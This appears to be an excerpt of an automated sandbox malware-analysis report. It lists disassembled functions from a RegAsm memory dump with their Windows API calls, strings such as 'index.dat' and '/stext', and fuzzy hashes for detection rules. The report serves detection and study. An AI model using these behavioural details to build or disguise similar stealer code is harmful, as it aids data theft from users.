                                                                                Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$File$PointerRead
                                                                                • String ID:
                                                                                • API String ID: 839530781-0
                                                                                • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID: *.*$index.dat
                                                                                • API String ID: 1974802433-2863569691
                                                                                • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@mallocmemcpy
                                                                                • String ID:
                                                                                • API String ID: 3831604043-0
                                                                                • Opcode ID: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                                                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                • Opcode Fuzzy Hash: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                                                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$FilePointer
                                                                                • String ID:
                                                                                • API String ID: 1156039329-0
                                                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTime
                                                                                • String ID:
                                                                                • API String ID: 3397143404-0
                                                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                                • String ID:
                                                                                • API String ID: 1125800050-0
                                                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleSleep
                                                                                • String ID: }A
                                                                                • API String ID: 252777609-2138825249
                                                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: BINARY
                                                                                • API String ID: 2221118986-907554435
                                                                                • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                Function 00405220 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • _mbscpy.MSVCRT ref: 00405250
                                                                                • _mbscat.MSVCRT ref: 0040525B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 568699880-0
                                                                                • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                                Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmp
                                                                                • String ID: /stext
                                                                                • API String ID: 2081463915-3817206916
                                                                                • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                Function 00409529 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$??2@CloseCreateHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 1023896661-0
                                                                                • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                                • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                                Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 2445788494-0
                                                                                • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcmpmemset
                                                                                • String ID:
                                                                                • API String ID: 1065087418-0
                                                                                • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                • String ID:
                                                                                • API String ID: 1381354015-0
                                                                                • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                Function 004136C0 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                  • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                • String ID:
                                                                                • API String ID: 2154303073-0
                                                                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$PointerRead
                                                                                • String ID:
                                                                                • API String ID: 3154509469-0
                                                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                • String ID:
                                                                                • API String ID: 4232544981-0
                                                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FileModuleName
                                                                                • String ID:
                                                                                • API String ID: 514040917-0
                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
